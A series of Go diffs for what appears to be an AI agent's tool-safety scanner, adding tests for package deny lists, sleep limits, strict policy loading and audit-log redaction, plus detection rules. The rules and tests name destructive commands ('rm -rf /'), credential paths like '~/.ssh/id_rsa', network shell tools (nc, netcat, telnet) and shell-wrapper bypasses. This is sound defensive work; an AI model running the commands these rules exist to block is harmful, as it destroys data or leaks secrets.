+		t.Fatalf("NewScanner: %v", err)
+	}
+
+	report := scan(t, s, "pip install foo malicious-pkg bar", BackendWorkspaceExec)
+	if report.Verdict != VerdictDeny {
+		t.Errorf("denied package among multiple must be denied: got %s; risks=%+v",
+			report.Verdict, report.Risks)
+	}
+}
+
+func TestDeniedPackage_NoSubstringMatch(t *testing.T) {
+	policy := DefaultPolicy()
+	policy.Commands.Allowed = []string{"pip"}
+	policy.DependencyPolicy.AllowedManagers = []string{"pip"}
+	policy.DependencyPolicy.DeniedPackages = []string{"malicious"}
+
+	s, err := NewScanner(policy)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+
+	// "malicious-pkg" is not an exact match for "malicious", so it
+	// should not be denied by the denied-packages check (though it
+	// may still be ask due to the medium-risk dependency rule).
+	report := scan(t, s, "pip install malicious-pkg", BackendWorkspaceExec)
+	if report.Verdict == VerdictDeny {
+		t.Errorf("substring should not match denied package: got %s; risks=%+v",
+			report.Verdict, report.Risks)
+	}
+}
+
+func TestDeniedPackage_GoImportPath(t *testing.T) {
+	policy := DefaultPolicy()
+	policy.Commands.Allowed = []string{"go"}
+	policy.DependencyPolicy.AllowedManagers = []string{"go"}
+	policy.DependencyPolicy.DeniedPackages = []string{"github.com/malicious/pkg"}
+
+	s, err := NewScanner(policy)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+
+	report := scan(t, s, "go install github.com/malicious/pkg@latest", BackendWorkspaceExec)
+	if report.Verdict != VerdictDeny {
+		t.Errorf("denied go package must be denied: got %s; risks=%+v",
+			report.Verdict, report.Risks)
+	}
+}
+
+// ----------------------------------------------------------------------
+// AllowedSleepSeconds edge-case tests
+// ----------------------------------------------------------------------
+
+func TestAllowedSleepSeconds_UnderLimit(t *testing.T) {
+	policy := DefaultPolicy()
+	policy.Commands.Allowed = nil
+	policy.Commands.Denied = nil
+	policy.ResourceLimits.AllowedSleepSeconds = 5
+
+	s, err := NewScanner(policy)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+
+	report := scan(t, s, "sleep 3", BackendWorkspaceExec)
+	// sleep 3 with maxSleep=5 should not trigger the resource_abuse
+	// rule.  The command may still be denied for other reasons, but
+	// the resource_abuse rule must not fire.
+	for _, r := range report.Risks {
+		if r.RuleID == "resource_abuse" {
+			t.Errorf("sleep under limit should not trigger resource_abuse: %+v", r)
+		}
+	}
+}
+
+func TestAllowedSleepSeconds_ZeroDisables(t *testing.T) {
+	policy := DefaultPolicy()
+	policy.Commands.Allowed = nil
+	policy.Commands.Denied = nil
+	policy.ResourceLimits.AllowedSleepSeconds = 0
+
+	s, err := NewScanner(policy)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+
+	report := scan(t, s, "sleep 999999", BackendWorkspaceExec)
+	for _, r := range report.Risks {
+		if r.RuleID == "resource_abuse" {
+			t.Errorf("maxSleep=0 should disable sleep check: %+v", r)
+		}
+	}
+}
+
+func TestAllowedSleepSeconds_EqualLimit(t *testing.T) {
+	policy := DefaultPolicy()
+	policy.Commands.Allowed = nil
+	policy.Commands.Denied = nil
+	policy.ResourceLimits.AllowedSleepSeconds = 5
+
+	s, err := NewScanner(policy)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+
+	report := scan(t, s, "sleep 5", BackendWorkspaceExec)
+	// Equal to the limit should not trigger the check (only > triggers).
+	for _, r := range report.Risks {
+		if r.RuleID == "resource_abuse" {
+			t.Errorf("sleep equal to limit should not trigger resource_abuse: %+v", r)
+		}
+	}
+}
+
+// ----------------------------------------------------------------------
+// Backward compatibility: old YAML with removed fields must still load
+// ----------------------------------------------------------------------
+
+func TestPolicy_RemovedFields_StillLoadsYAML(t *testing.T) {
+	yamlData := `version: "1.0"
+default_verdict: allow
+env_whitelist:
+  - PATH
+  - HOME
+resource_limits:
+  max_timeout_seconds: 600
+  max_output_bytes: 10485760
+  max_concurrent_processes: 10
+  allowed_sleep_seconds: 60
+backend_policies:
+  workspaceexec:
+    allow_pty: true
+    allow_background: false
+    require_human_review: false
+  hostexec:
+    allow_pty: false
+    allow_background: false
+    require_human_review: true
+`
+	tmpDir := t.TempDir()
+	policyPath := filepath.Join(tmpDir, "policy.yaml")
+	if err := os.WriteFile(policyPath, []byte(yamlData), 0o600); err != nil {
+		t.Fatalf("write policy: %v", err)
+	}
+
+	policy, err := LoadPolicy(policyPath)
+	if err != nil {
+		t.Fatalf("LoadPolicy with removed fields should succeed: %v", err)
+	}
+
+	// The supported field should still be loaded correctly.
+	if policy.ResourceLimits.AllowedSleepSeconds != 60 {
+		t.Errorf("allowed_sleep_seconds: got %d want 60",
+			policy.ResourceLimits.AllowedSleepSeconds)
+	}
+}

--- a/tool/safety/policy_loader.go
+++ b/tool/safety/policy_loader.go
@@ -9,6 +9,7 @@
 package safety
 
 import (
+	"bytes"
 	"encoding/json"
 	"fmt"
 	"os"
@@ -30,7 +31,9 @@ func LoadPolicy(path string) (*Policy, error) {
 	ext := strings.ToLower(path)
 	switch {
 	case strings.HasSuffix(ext, ".json"):
-		if err := json.Unmarshal(data, policy); err != nil {
+		d := json.NewDecoder(bytes.NewReader(data))
+		d.DisallowUnknownFields()
+		if err := d.Decode(policy); err != nil {
 			return nil, fmt.Errorf("safety: parse JSON policy: %w", err)
 		}
 	default: // .yaml, .yml, or anything else

--- a/tool/safety/policy_loader.go
+++ b/tool/safety/policy_loader.go
@@ -1,0 +1,58 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2025 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import (
+	"encoding/json"
+	"fmt"
+	"os"
+	"strings"
+
+	"gopkg.in/yaml.v3"
+)
+
+// LoadPolicy reads a safety policy from path.  The file format is
+// determined by the extension: .yaml/.yml → YAML, .json → JSON.
+// Any other extension defaults to YAML.
+func LoadPolicy(path string) (*Policy, error) {
+	data, err := os.ReadFile(path)
+	if err != nil {
+		return nil, fmt.Errorf("safety: read policy file %q: %w", path, err)
+	}
+
+	policy := &Policy{}
+	ext := strings.ToLower(path)
+	switch {
+	case strings.HasSuffix(ext, ".json"):
+		if err := json.Unmarshal(data, policy); err != nil {
+			return nil, fmt.Errorf("safety: parse JSON policy: %w", err)
+		}
+	default: // .yaml, .yml, or anything else
+		if err := yaml.Unmarshal(data, policy); err != nil {
+			return nil, fmt.Errorf("safety: parse YAML policy: %w", err)
+		}
+	}
+
+	if err := policy.validate(); err != nil {
+		return nil, fmt.Errorf("safety: invalid policy: %w", err)
+	}
+
+	return policy, nil
+}
+
+// validate checks the policy for internal consistency.
+func (p *Policy) validate() error {
+	switch p.DefaultVerdict {
+	case "", VerdictAllow, VerdictDeny, VerdictAsk:
+		// Empty defaults to allow.
+	default:
+		return fmt.Errorf("invalid default_verdict %q", p.DefaultVerdict)
+	}
+	return nil
+}

--- a/tool/safety/policy_loader.go
+++ b/tool/safety/policy_loader.go
@@ -37,7 +37,9 @@ func LoadPolicy(path string) (*Policy, error) {
 			return nil, fmt.Errorf("safety: parse JSON policy: %w", err)
 		}
 	default: // .yaml, .yml, or anything else
-		if err := yaml.Unmarshal(data, policy); err != nil {
+		d := yaml.NewDecoder(bytes.NewReader(data))
+		d.KnownFields(true)
+		if err := d.Decode(policy); err != nil {
 			return nil, fmt.Errorf("safety: parse YAML policy: %w", err)
 		}
 	}

--- a/tool/safety/policy_strict_yaml_test.go
+++ b/tool/safety/policy_strict_yaml_test.go
@@ -1,0 +1,98 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2026 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import (
+	"os"
+	"path/filepath"
+	"testing"
+)
+
+// TestLoadPolicy_YAML_RejectsUnknownField verifies that a typo in a
+// security-relevant YAML field causes LoadPolicy to fail instead of
+// silently leaving the field at its zero value (which would fail-open
+// an intended review requirement).
+//
+// Example: "require_human_reveiw" (missing the 'e' in "review") must
+// produce an error, not silently leave RequireHumanReview as false.
+func TestLoadPolicy_YAML_RejectsUnknownField(t *testing.T) {
+	// "require_human_reveiw" is a typo of "require_human_review".
+	// With KnownFields(true), this must fail to load.
+	yamlData := `version: "1.0"
+default_verdict: allow
+backend_policies:
+  hostexec:
+    allow_background: false
+    require_human_reveiw: true
+`
+	tmpDir := t.TempDir()
+	policyPath := filepath.Join(tmpDir, "policy.yaml")
+	if err := os.WriteFile(policyPath, []byte(yamlData), 0o600); err != nil {
+		t.Fatalf("write policy: %v", err)
+	}
+
+	_, err := LoadPolicy(policyPath)
+	if err == nil {
+		t.Fatal("LoadPolicy with typo'd field 'require_human_reveiw' must " +
+			"fail, not silently leave RequireHumanReview at its zero value")
+	}
+}
+
+// TestLoadPolicy_YAML_RejectsUnknownTopLevelField verifies that an
+// unknown top-level field is rejected by the YAML decoder.
+func TestLoadPolicy_YAML_RejectsUnknownTopLevelField(t *testing.T) {
+	yamlData := `version: "1.0"
+default_verdict: allow
+nonexistent_field: "this should cause an error"
+`
+	tmpDir := t.TempDir()
+	policyPath := filepath.Join(tmpDir, "policy.yaml")
+	if err := os.WriteFile(policyPath, []byte(yamlData), 0o600); err != nil {
+		t.Fatalf("write policy: %v", err)
+	}
+
+	_, err := LoadPolicy(policyPath)
+	if err == nil {
+		t.Fatal("LoadPolicy with unknown top-level field must fail")
+	}
+}
+
+// TestLoadPolicy_YAML_RejectsUnknownNestedField verifies that an
+// unknown field nested inside a sub-struct is also rejected.
+func TestLoadPolicy_YAML_RejectsUnknownNestedField(t *testing.T) {
+	yamlData := `version: "1.0"
+default_verdict: allow
+resource_limits:
+  allowed_sleep_seconds: 30
+  nonexistent_limit: 999
+`
+	tmpDir := t.TempDir()
+	policyPath := filepath.Join(tmpDir, "policy.yaml")
+	if err := os.WriteFile(policyPath, []byte(yamlData), 0o600); err != nil {
+		t.Fatalf("write policy: %v", err)
+	}
+
+	_, err := LoadPolicy(policyPath)
+	if err == nil {
+		t.Fatal("LoadPolicy with unknown nested field must fail")
+	}
+}
+
+// TestLoadPolicy_YAML_ShippedPolicyLoads verifies that the shipped
+// tool_safety_policy.yaml loads without error under KnownFields(true),
+// ensuring strict mode does not produce false positives on the real
+// policy.
+func TestLoadPolicy_YAML_ShippedPolicyLoads(t *testing.T) {
+	policyPath := filepath.Join("..", "safety", "tool_safety_policy.yaml")
+	_, err := LoadPolicy(policyPath)
+	if err != nil {
+		t.Fatalf("shipped tool_safety_policy.yaml must load under "+
+			"KnownFields(true) without error: %v", err)
+	}
+}

--- a/tool/safety/redactor.go
+++ b/tool/safety/redactor.go
@@ -1,0 +1,41 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2025 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import (
+	"regexp"
+)
+
+// Redactor masks sensitive information in strings before they are
+// written to audit logs or span attributes.
+type Redactor struct {
+	patterns []*regexp.Regexp
+}
+
+// NewRedactor compiles the given regex patterns and returns a
+// Redactor that replaces matches with "[REDACTED]".
+func NewRedactor(patterns []string) *Redactor {
+	compiled, err := compilePatterns(patterns)
+	if err != nil {
+		// Fall back to a no-op redactor if patterns are invalid.
+		return &Redactor{}
+	}
+	return &Redactor{patterns: compiled}
+}
+
+// Redact returns a copy of s with all sensitive matches replaced by
+// "[REDACTED]".  If no patterns are configured the input is returned
+// unchanged.
+func (r *Redactor) Redact(s string) string {
+	result := s
+	for _, re := range r.patterns {
+		result = re.ReplaceAllString(result, "[REDACTED]")
+	}
+	return result
+}

--- a/tool/safety/redactor.go
+++ b/tool/safety/redactor.go
@@ -9,6 +9,7 @@
 package safety
 
 import (
+	"fmt"
 	"regexp"
 )
 
@@ -19,14 +20,16 @@ type Redactor struct {
 }
 
 // NewRedactor compiles the given regex patterns and returns a
-// Redactor that replaces matches with "[REDACTED]".
-func NewRedactor(patterns []string) *Redactor {
+// Redactor that replaces matches with "[REDACTED]".  If any pattern
+// fails to compile, NewRedactor returns a non-nil error and a nil
+// Redactor: a broken redaction pattern must not silently degrade
+// into a no-op that would persist secrets in clear text.
+func NewRedactor(patterns []string) (*Redactor, error) {
 	compiled, err := compilePatterns(patterns)
 	if err != nil {
-		// Fall back to a no-op redactor if patterns are invalid.
-		return &Redactor{}
+		return nil, fmt.Errorf("safety: redactor: %w", err)
 	}
-	return &Redactor{patterns: compiled}
+	return &Redactor{patterns: compiled}, nil
 }
 
 // Redact returns a copy of s with all sensitive matches replaced by

--- a/tool/safety/redactor_test.go
+++ b/tool/safety/redactor_test.go
@@ -1,0 +1,111 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2026 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import (
+	"context"
+	"encoding/json"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+)
+
+// TestNewRedactor_InvalidRegex_ReturnsError verifies that constructing
+// a Redactor with an uncompileable regex pattern fails loudly instead
+// of silently degrading into a no-op redactor that would let every
+// secret through unredacted.
+func TestNewRedactor_InvalidRegex_ReturnsError(t *testing.T) {
+	// "[" is an unterminated character class — RE2 rejects it.
+	r, err := NewRedactor([]string{"["})
+	if err == nil {
+		t.Fatal("NewRedactor with an invalid regex must return a " +
+			"non-nil error, not silently fall back to a no-op redactor")
+	}
+	if r != nil {
+		t.Errorf("NewRedactor with an invalid regex must return a nil " +
+			"redactor so callers cannot accidentally use a broken one")
+	}
+}
+
+// TestNewAuditLogger_InvalidRegex_ReturnsError verifies that an
+// invalid redaction pattern surfaces as an error from NewAuditLogger
+// rather than succeeding with a no-op redactor that would persist
+// sensitive commands in clear text.  This guards the audit-logger
+// seam against a regression that swallows the redactor error.
+func TestNewAuditLogger_InvalidRegex_ReturnsError(t *testing.T) {
+	logPath := filepath.Join(t.TempDir(), "audit.jsonl")
+
+	// "[" is an unterminated character class — RE2 rejects it.
+	logger, err := NewAuditLogger(logPath, []string{"["})
+	if err == nil {
+		if logger != nil {
+			_ = logger.Close()
+		}
+		t.Fatal("NewAuditLogger with an invalid regex must return a " +
+			"non-nil error, not succeed with a no-op redactor")
+	}
+	if logger != nil {
+		t.Errorf("NewAuditLogger with an invalid regex must return a " +
+			"nil logger so callers cannot use one with a broken redactor")
+	}
+}
+
+// TestNewAuditLogger_ValidRegex_RedactsEndToEnd verifies that a valid
+// custom redaction pattern is honored all the way through to the
+// persisted audit record: the matched secret must appear as
+// "[REDACTED]" in the JSONL event, not in clear text.  This guards
+// against an over-broad fix that errors on valid patterns or returns
+// a silently no-op redactor.
+func TestNewAuditLogger_ValidRegex_RedactsEndToEnd(t *testing.T) {
+	logPath := filepath.Join(t.TempDir(), "audit.jsonl")
+
+	// "AKIA" + exactly 16 alphanumerics, so the whole token is matched
+	// and redacted by the pattern below.
+	const secret = "AKIAEXAMPLESECRET012"
+	pattern := `AKIA[A-Z0-9]{16}`
+
+	logger, err := NewAuditLogger(logPath, []string{pattern})
+	if err != nil {
+		t.Fatalf("NewAuditLogger with a valid regex must succeed: %v", err)
+	}
+	defer logger.Close() //nolint:errcheck
+
+	report := &ScanReport{
+		ToolName: "workspace_exec",
+		Command:  "export AWS_KEY=" + secret,
+		Backend:  BackendWorkspaceExec,
+		Verdict:  VerdictDeny,
+	}
+	if err := logger.Log(context.Background(), report, 0); err != nil {
+		t.Fatalf("Log: %v", err)
+	}
+
+	data, err := os.ReadFile(logPath)
+	if err != nil {
+		t.Fatalf("read audit log: %v", err)
+	}
+
+	var event AuditEvent
+	if err := json.Unmarshal(data, &event); err != nil {
+		t.Fatalf("unmarshal audit event: %v", err)
+	}
+
+	const wantCommand = "export AWS_KEY=[REDACTED]"
+	if got := event.Command; got != wantCommand {
+		t.Errorf("redacted command = %q, want %q (secret must not leak)", got, wantCommand)
+	}
+	if !event.Redacted {
+		t.Errorf("event.Redacted = false, want true (pattern matched)")
+	}
+	// Guard against the secret leaking anywhere in the persisted line.
+	if strings.Contains(string(data), secret) {
+		t.Errorf("secret leaked into audit log; raw line: %s", data)
+	}
+}

--- a/tool/safety/regression_test.go
+++ b/tool/safety/regression_test.go
@@ -16,15 +16,15 @@ import (
 	"testing"
 )
 
-// This file contains red tests that reproduce the P0 issues called out
-// in the code review.  Each test must FAIL on the current implementation
-// and PASS after the corresponding fix.  They double as regression
-// tests once the bugs are fixed.
+// This file contains regression tests for scanner/audit defects found
+// during code review.  Each test FAILS on the pre-fix implementation and
+// PASSES after the corresponding fix, and stays in the tree to guard
+// against regressions of the fixed behavior.
 //
-// P0-3 (Blocked field redundant with Decision) is a design issue rather
-// than a behavioral bug, so it is not covered here; a behavioural test
-// for it would be tautological.  Resolved by the Decision→Verdict
-// rename and removal of the Blocked field.
+// The Blocked field redundant with Verdict was a design issue rather
+// than a behavioral bug, so it is not covered here; a behavioral test
+// for it would be tautological.  It was resolved by the
+// Decision→Verdict rename and removal of the Blocked field.
 
 func countRisksByRuleID(risks []Risk, ruleID string) int {
 	n := 0
@@ -37,7 +37,7 @@ func countRisksByRuleID(risks []Risk, ruleID string) int {
 }
 
 // ----------------------------------------------------------------------
-// P0-1: policy.DefaultVerdict must be honored when no rule fires.
+// policy.DefaultVerdict must be honored when no rule fires.
 //
 // Currently scanner.computeVerdict() always returns VerdictAllow when
 // no rule fires, ignoring policy.DefaultVerdict.  A user who sets
@@ -46,7 +46,7 @@ func countRisksByRuleID(risks []Risk, ruleID string) int {
 // deny variants of this bug.
 // ----------------------------------------------------------------------
 
-func TestP0_DefaultVerdictAsk_HonoredForSafeCommand(t *testing.T) {
+func TestDefaultVerdictAsk_HonoredForSafeCommand(t *testing.T) {
 	policy := DefaultPolicy()
 	policy.DefaultVerdict = VerdictAsk
 	s, err := NewScanner(policy)
@@ -65,7 +65,7 @@ func TestP0_DefaultVerdictAsk_HonoredForSafeCommand(t *testing.T) {
 	}
 }
 
-func TestP0_DefaultVerdictDeny_HonoredForSafeCommand(t *testing.T) {
+func TestDefaultVerdictDeny_HonoredForSafeCommand(t *testing.T) {
 	policy := DefaultPolicy()
 	policy.DefaultVerdict = VerdictDeny
 	s, err := NewScanner(policy)
@@ -82,7 +82,7 @@ func TestP0_DefaultVerdictDeny_HonoredForSafeCommand(t *testing.T) {
 }
 
 // ----------------------------------------------------------------------
-// P0-2: each RuleID must appear at most once in a report.
+// each RuleID must appear at most once in a report.
 //
 // When shellsafe rejects a command via the user-configured deny list,
 // scanner.go manually appends a Risk with RuleID="dangerous_command".
@@ -92,7 +92,7 @@ func TestP0_DefaultVerdictDeny_HonoredForSafeCommand(t *testing.T) {
 // produces duplicate OTel span attributes.
 // ----------------------------------------------------------------------
 
-func TestP0_NoDuplicateDangerousCommandRisk(t *testing.T) {
+func TestNoDuplicateDangerousCommandRisk(t *testing.T) {
 	s := newTestScanner(t)
 
 	// "rm -rf /" hits both the shellsafe deny list and the
@@ -107,7 +107,7 @@ func TestP0_NoDuplicateDangerousCommandRisk(t *testing.T) {
 }
 
 // ----------------------------------------------------------------------
-// P0-4: DependencyPolicy.DeniedPackages must be enforced.
+// DependencyPolicy.DeniedPackages must be enforced.
 //
 // dependencyRule.Check currently only inspects AllowedManagers and
 // emits a medium risk for any install from an allowed manager.  The
@@ -116,7 +116,7 @@ func TestP0_NoDuplicateDangerousCommandRisk(t *testing.T) {
 // expects the install to be denied, not merely reviewed.
 // ----------------------------------------------------------------------
 
-func TestP0_DeniedPackage_BlocksInstall(t *testing.T) {
+func TestDeniedPackage_BlocksInstall(t *testing.T) {
 	policy := DefaultPolicy()
 	// Make shellsafe accept "pip" so the command reaches the rules.
 	policy.Commands.Allowed = []string{"pip"}
@@ -141,7 +141,7 @@ func TestP0_DeniedPackage_BlocksInstall(t *testing.T) {
 }
 
 // ----------------------------------------------------------------------
-// P0-4: ResourceLimits.AllowedSleepSeconds must be enforced.
+// ResourceLimits.AllowedSleepSeconds must be enforced.
 //
 // resourceAbuseRule stores maxSleep in its struct but never reads it
 // in Check().  A user setting allowed_sleep_seconds: 5 expects
@@ -150,7 +150,7 @@ func TestP0_DeniedPackage_BlocksInstall(t *testing.T) {
 // list check is inactive).
 // ----------------------------------------------------------------------
 
-func TestP0_AllowedSleepSeconds_BlocksLongSleep(t *testing.T) {
+func TestAllowedSleepSeconds_BlocksLongSleep(t *testing.T) {
 	policy := DefaultPolicy()
 	// Disable shellsafe's allow/deny list so the command reaches the
 	// rules.  This isolates the resourceAbuseRule behaviour.
@@ -172,7 +172,7 @@ func TestP0_AllowedSleepSeconds_BlocksLongSleep(t *testing.T) {
 }
 
 // ----------------------------------------------------------------------
-// P0-5: AuditLogger must use the policy's SensitivePatterns, not the
+// AuditLogger must use the policy's SensitivePatterns, not the
 // defaults.
 //
 // NewAuditLogger currently hardcodes
@@ -183,7 +183,7 @@ func TestP0_AllowedSleepSeconds_BlocksLongSleep(t *testing.T) {
 // persisted to disk in cleartext.
 // ----------------------------------------------------------------------
 
-func TestP0_CustomSensitivePatterns_RedactedInAuditLog(t *testing.T) {
+func TestCustomSensitivePatterns_RedactedInAuditLog(t *testing.T) {
 	tmpDir := t.TempDir()
 	policyPath := filepath.Join(tmpDir, "policy.yaml")
 	auditPath := filepath.Join(tmpDir, "audit.jsonl")

--- a/tool/safety/rules.go
+++ b/tool/safety/rules.go
@@ -1,0 +1,664 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2025 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import (
+	"context"
+	"fmt"
+	"os"
+	"regexp"
+	"strconv"
+	"strings"
+)
+
+// defaultRules returns the rule set covering all seven risk categories.
+func defaultRules(p *Policy) ([]Rule, error) {
+	sensitivePatterns, err := compilePatterns(p.SensitivePatterns)
+	if err != nil {
+		return nil, fmt.Errorf("compile sensitive patterns: %w", err)
+	}
+
+	forbiddenPaths := expandPaths(p.ForbiddenPaths)
+	networkWhitelist := toLowerSlice(p.NetworkWhitelist)
+
+	return []Rule{
+		&dangerousCommandRule{forbiddenPaths: forbiddenPaths},
+		&networkEgressRule{whitelist: networkWhitelist},
+		&shellBypassRule{},
+		&hostExecRiskRule{policy: p.BackendPolicies.HostExec},
+		&dependencyRule{allowed: p.DependencyPolicy.AllowedManagers, denied: p.DependencyPolicy.DeniedPackages},
+		&resourceAbuseRule{maxSleep: p.ResourceLimits.AllowedSleepSeconds},
+		&sensitiveLeakRule{patterns: sensitivePatterns, forbiddenPaths: forbiddenPaths},
+		&codeExecDangerRule{},
+	}, nil
+}
+
+// ----------------------------------------------------------------
+// Rule 1: Dangerous command
+//
+// Detects: rm -rf and access to forbidden paths (credentials, system
+// files).  This rule fires after shellsafe has already accepted the
+// command structurally, so it catches semantic dangers that the
+// allow/deny list alone might miss (e.g. "cat ~/.ssh/id_rsa" where
+// "cat" is allowed but the path is forbidden).
+// ----------------------------------------------------------------
+
+type dangerousCommandRule struct {
+	forbiddenPaths []string
+}
+
+func (r *dangerousCommandRule) ID() string   { return "dangerous_command" }
+func (r *dangerousCommandRule) Name() string { return "Dangerous Command" }
+
+func (r *dangerousCommandRule) Check(_ context.Context, req *ScanRequest) *Risk {
+	cmd := req.Command
+	lower := strings.ToLower(cmd)
+
+	// rm -rf pattern (especially targeting root or system dirs).
+	if strings.Contains(lower, "rm ") && strings.Contains(lower, "-rf") {
+		return &Risk{
+			RuleID:      r.ID(),
+			RuleName:    r.Name(),
+			Level:       RiskCritical,
+			Evidence:    fmt.Sprintf("destructive 'rm -rf' detected: %s", truncate(cmd, 80)),
+			Suggestion:  "specify precise paths and avoid recursive force delete",
+			ShouldBlock: true,
+		}
+	}
+
+	// Forbidden path access.  Check both the expanded path (e.g.
+	// /Users/x/.ssh) and the raw tilde form (~/.ssh) so commands
+	// using the tilde shorthand are caught too.
+	for _, fp := range r.forbiddenPaths {
+		if pathMatches(cmd, fp) || pathMatches(cmd, rawTildePath(fp)) {
+			return &Risk{
+				RuleID:      r.ID(),
+				RuleName:    r.Name(),
+				Level:       RiskCritical,
+				Evidence:    fmt.Sprintf("access to forbidden path %q detected", fp),
+				Suggestion:  "do not read or write credential, secret, or system files",
+				ShouldBlock: true,
+			}
+		}
+	}
+
+	// /dev/zero and /dev/urandom — resource abuse via infinite streams.
+	if strings.Contains(lower, "/dev/zero") || strings.Contains(lower, "/dev/urandom") {
+		return &Risk{
+			RuleID:      r.ID(),
+			RuleName:    r.Name(),
+			Level:       RiskHigh,
+			Evidence:    fmt.Sprintf("access to device stream %q", "/dev/zero or /dev/urandom"),
+			Suggestion:  "avoid reading from infinite device streams",
+			ShouldBlock: true,
+		}
+	}
+
+	return nil
+}
+
+// rawTildePath converts an expanded path back to its tilde form so
+// commands using ~/.ssh are matched even when the forbidden path was
+// expanded to /Users/x/.ssh.
+func rawTildePath(expanded string) string {
+	home := getHomeDir()
+	if home != "" && strings.HasPrefix(expanded, home) {
+		return "~" + expanded[len(home):]
+	}
+	return expanded
+}
+
+// pathMatches checks whether cmd references a forbidden path. The
+// forbidden path may be a glob pattern (* is treated as wildcard).
+func pathMatches(cmd, forbidden string) bool {
+	// Expand wildcards: "*.env" → check if cmd contains ".env".
+	if strings.Contains(forbidden, "*") {
+		stripped := strings.ReplaceAll(forbidden, "*", "")
+		return strings.Contains(strings.ToLower(cmd), strings.ToLower(stripped))
+	}
+	return strings.Contains(strings.ToLower(cmd), strings.ToLower(forbidden))
+}
+
+// ----------------------------------------------------------------
+// Rule 2: Network egress
+//
+// Detects network commands (curl, wget, nc, ssh, telnet, etc.)
+// targeting hosts not in the whitelist.  Since shellsafe's implicit
+// deny already blocks most of these tools, this rule primarily
+// catches go get / go install / npm install patterns that reference
+// non-whitelisted domains, as well as commands that embed URLs.
+// ----------------------------------------------------------------
+
+type networkEgressRule struct {
+	whitelist []string
+}
+
+func (r *networkEgressRule) ID() string   { return "network_egress" }
+func (r *networkEgressRule) Name() string { return "Network Egress" }
+
+func (r *networkEgressRule) Check(_ context.Context, req *ScanRequest) *Risk {
+	cmd := req.Command
+	lower := strings.ToLower(cmd)
+
+	// Extract URLs from the command.
+	urls := extractURLs(lower)
+	for _, u := range urls {
+		host := extractHost(u)
+		if host == "" {
+			continue
+		}
+		if !isWhitelisted(host, r.whitelist) {
+			return &Risk{
+				RuleID:      r.ID(),
+				RuleName:    r.Name(),
+				Level:       RiskCritical,
+				Evidence:    fmt.Sprintf("network egress to non-whitelisted host %q", host),
+				Suggestion:  fmt.Sprintf("add %q to network_whitelist or use a whitelisted host", host),
+				ShouldBlock: true,
+			}
+		}
+	}
+
+	// Detect network commands without URL (nc, ssh, telnet).
+	networkCmds := []string{"nc ", "ncat ", "netcat ", "ssh ", "telnet ", "ftp "}
+	for _, nc := range networkCmds {
+		if strings.HasPrefix(lower, strings.TrimSpace(nc)) || strings.Contains(lower, " "+strings.TrimSpace(nc)) {
+			return &Risk{
+				RuleID:      r.ID(),
+				RuleName:    r.Name(),
+				Level:       RiskHigh,
+				Evidence:    fmt.Sprintf("network command detected: %s", truncate(cmd, 80)),
+				Suggestion:  "network commands require whitelisted hosts",
+				ShouldBlock: true,
+			}
+		}
+	}
+
+	return nil
+}
+
+// extractURLs finds http(s) URLs in a command string.
+func extractURLs(s string) []string {
+	re := regexp.MustCompile(`https?://[^\s'"|;<>]+`)
+	return re.FindAllString(s, -1)
+}
+
+// extractHost extracts the hostname from a URL string.
+func extractHost(url string) string {
+	// Strip scheme.
+	s := url
+	if i := strings.Index(s, "://"); i >= 0 {
+		s = s[i+3:]
+	}
+	// Strip path.
+	if i := strings.IndexAny(s, "/:"); i >= 0 {
+		s = s[:i]
+	}
+	return strings.ToLower(s)
+}
+
+// isWhitelisted checks whether host matches any whitelist entry.
+// Supports wildcard patterns like "*.github.com".
+func isWhitelisted(host string, whitelist []string) bool {
+	for _, w := range whitelist {
+		if w == host {
+			return true
+		}
+		if strings.HasPrefix(w, "*.") {
+			suffix := w[1:] // ".github.com"
+			if strings.HasSuffix(host, suffix) {
+				return true
+			}
+		}
+	}
+	return false
+}
+
+// ----------------------------------------------------------------
+// Rule 3: Shell bypass
+//
+// Detects attempts to bypass the shellsafe parser through shell
+// wrappers.  Most wrappers (sh -c, bash -c, eval, exec) are already
+// in shellsafe's implicit deny, so this rule catches cases that
+// shellsafe's structural parser accepts but are still suspicious
+// (e.g. commands that embed shell metacharacters in arguments).
+// ----------------------------------------------------------------
+
+type shellBypassRule struct{}
+
+func (r *shellBypassRule) ID() string   { return "shell_bypass" }
+func (r *shellBypassRule) Name() string { return "Shell Wrapper Bypass" }
+
+func (r *shellBypassRule) Check(_ context.Context, req *ScanRequest) *Risk {
+	// shellsafe already rejected $(), backticks, and redirections at
+	// the parse stage.  If we reach here, the command parsed cleanly.
+	// This rule is a secondary check for patterns that survived parse
+	// but still look like bypass attempts.
+	lower := strings.ToLower(req.Command)
+	if strings.Contains(lower, "sh -c") || strings.Contains(lower, "bash -c") {
+		return &Risk{
+			RuleID:      r.ID(),
+			RuleName:    r.Name(),
+			Level:       RiskCritical,
+			Evidence:    "shell wrapper with -c flag detected",
+			Suggestion:  "execute commands directly without a shell wrapper",
+			ShouldBlock: true,
+		}
+	}
+	return nil
+}
+
+// ----------------------------------------------------------------
+// Rule 4: Hostexec risk
+//
+// Detects risks specific to hostexec: privilege escalation (sudo/su
+// are in shellsafe implicit deny, but we double-check), background
+// processes, and long sessions.  Also enforces the
+// RequireHumanReview policy for hostexec.
+// ----------------------------------------------------------------
+
